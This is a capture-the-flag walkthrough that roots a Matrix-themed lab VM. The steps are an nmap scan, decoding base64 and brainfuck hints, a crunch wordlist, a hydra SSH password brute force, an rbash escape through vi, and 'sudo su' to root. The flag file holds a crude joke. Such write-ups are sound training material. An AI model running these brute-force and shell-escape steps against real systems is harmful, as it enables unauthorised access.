Lets first start off with an nmap scan of the remote host.
root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.103 Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-17 16:29 MST Nmap scan report for wordy (192.168.56.103) Host is up (0.00041s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.7 (protocol 2.0) | ssh-hostkey: | 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA) | 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA) |_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (EdDSA) 80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14) |_http-server-header: SimpleHTTP/0.6 Python/2.7.14 |_http-title: Welcome in Matrix 31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14) |_http-server-header: SimpleHTTP/0.6 Python/2.7.14 |_http-title: Welcome in Matrix MAC Address: 08:00:27:E5:B2:AA (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.8 Network Distance: 1 hop OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds root@ubuntu:~/src#
NMAP came back with three ports open 22,80 and 31337. Two of these look like web servers so lets visit the pages and see what they have to offer.
http://192.168.56.103: http://192.168.56.103:31337If we view source on the website on port 31337 we find a base64 encoded string embedded in the source code.
class="service__text">ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=
Decoded base64 in to:
root@ubuntu:~/src# echo ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= | base64 -d echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix root@ubuntu:~/src#
Cypher.matrix could be a user name or a file. Lets try it in the url and see what happens.
http://192.168.56.103:31337/Cypher.matrix +++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++ +.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.- -.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+ +++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>--- ---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[- >++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- ----- -<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++ +[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+ +++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++< ]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[ ...
We get back a file encoded in brainfuck our next task is to decode the text in to something readable. I went to this site to decode the file: https://www.splitbrain.org/_static/ook/
You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
We get another hint this time on how to login to the box, but first we have to generate a password list according to the hint given. For that we will use crunch wordlist utiltiy.
root@ubuntu:~/src/crunch# ./crunch 8 8 -t k1ll0r%@ -o dict.txt Crunch will now generate the following amount of data: 2340 bytes 0 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 260 crunch: 100% completed generating output root@ubuntu:~/src/crunch#
Next we will fire up hydra and start brute forcing the ssh server with our user guest and password list we just generated.
root@ubuntu:~/src/crunch# hydra -l guest -P /home/sam/src/crunch/dict.txt ssh://192.168.56.103 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-17 16:46:54 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task [DATA] attacking ssh://192.168.56.103:22/ [22][ssh] host: 192.168.56.103 login: guest password: k1ll0r7n 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 16 targets did not complete Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-17 16:47:16 root@ubuntu:~/src/crunch#
We found the password for the user 'guest'. Now lets login to the ssh server and get a system shell.
root@ubuntu:~/src/crunch# ssh guest@192.168.56.103 The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established. ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.56.103' (ECDSA) to the list of known hosts. guest@192.168.56.103's password: Last login: Mon Aug 6 16:25:44 2018 from 192.168.56.102 guest@porteus:~$
We logged in successfully, but when we try to run commands we see that we are in a restricted bash environment.
guest@porteus:~$ pwd /home/guest guest@porteus:~$ ls -la -rbash: /bin/ls: restricted: cannot specify `/' in command names guest@porteus:~$
One way we can break out of the rbash shell is to issue the vi command and within vi issue a :!/bin/bash command to break out in to a normal bash shell.
vi :!/bin/bash
Once we execute the vi instructions we see that we can cd directory and run commands.
guest@porteus:~$ cd /home guest@porteus:/home$ ls guest/ trinity/ guest@porteus:/home$
If we check sudo rights for the user guest we get back interesting results.
guest@porteus:~$ sudo -l User guest may run the following commands on porteus: (ALL) ALL (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper (trinity) NOPASSWD: /bin/cp guest@porteus:~$
We can run all programs so in order for us to be able to use sudo su we need to first set up out new unrestricted shell with some path variables.
guest@porteus:/home$ export SHELL=/bin/bash:$SHELL guest@porteus:/home$ export PATH=/usr/bin:$PATH guest@porteus:/home$ export PATH=/bin:$PATH
After we set up the shell we can try and run 'sudo su' on the system to gain a root shell.
guest@porteus:~$ sudo su We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. Password: root@porteus:/home/guest# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) root@porteus:/home/guest# whoami root root@porteus:/home/guest#
Now that we have root we can cd to /root and cat the flag.txt
root@porteus:/home/guest# cd /root root@porteus:~# ls -la total 74 drwx------ 16 root root 4096 Aug 14 2018 ./ drwxr-xr-x 51 root root 4096 Aug 6 2018 ../ -rw------- 1 root root 52 Aug 14 2018 .Xauthority -rw------- 1 root root 6187 Nov 18 00:05 .bash_history -rw-r--r-- 1 root root 79 Mar 5 2017 .bash_profile -rw-r--r-- 1 root root 1184 Apr 22 2018 .bashrc drwx------ 5 root root 4096 Aug 6 2018 .cache/ drwxr-xr-x 21 root root 4096 Aug 13 2018 .config/ drwx------ 3 root root 4096 Aug 6 2018 .dbus/ -rw------- 1 root root 16 Aug 6 2018 .esd_auth drwx------ 4 root root 4096 Aug 6 2018 .thumbnails/ drwxr-xr-x 2 root root 4096 Aug 6 2018 Desktop/ drwxr-xr-x 2 root root 4096 Aug 6 2018 Documents/ drwxr-xr-x 2 root root 4096 Aug 6 2018 Downloads/ drwxr-xr-x 2 root root 4096 Aug 6 2018 Music/ drwxr-xr-x 2 root root 4096 Aug 6 2018 Pictures/ drwxr-xr-x 2 root root 4096 Aug 6 2018 Public/ drwxr-xr-x 2 root root 4096 Aug 6 2018 Videos/ -rw-r--r-- 1 root root 691 Aug 14 2018 flag.txt root@porteus:~# cat flag.txt _,-. ,-' _| EVER REWIND OVER AND OVER AGAIN THROUGH THE |_,-O__`-._ INITIAL AGENT SMITH/NEO INTERROGATION SCENE |`-._\`.__ `_. IN THE MATRIX AND BEAT OFF |`-._`-.\,-'_| _,-'. `-.|.-' | |`.-'|_ WHAT | |_|,-'_`. |-._,-' | NO, ME NEITHER jrei | | _,' '-|_,-' IT'S JUST A HYPOTHETICAL QUESTION root@porteus:~#
No comments:
Post a Comment